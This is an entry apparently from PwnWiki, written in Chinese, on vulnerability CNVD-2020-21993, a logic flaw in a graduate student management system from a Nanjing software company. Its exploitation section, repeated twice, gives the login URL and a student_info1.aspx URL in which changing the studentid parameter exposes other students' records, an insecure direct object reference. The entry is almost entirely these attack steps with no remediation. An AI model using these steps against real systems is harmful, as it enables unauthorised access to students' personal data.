CNVD-2020-21993 南京南軟科技有限公司 研究生管理信息系統 邏輯缺陷漏洞
From PwnWiki
漏洞利用
登入系統
https://<target>/gmis/login.aspx
查看學生信息(XXXXXXXXX爲學號)
https://<target>/gmis/xjgl/student_info1.aspx?studentid=XXXXXXXXX
登入系統
https://<target>/gmis/login.aspx
查看學生信息(XXXXXXXXX爲學號)
https://<target>/gmis/xjgl/student_info1.aspx?studentid=XXXXXXXXX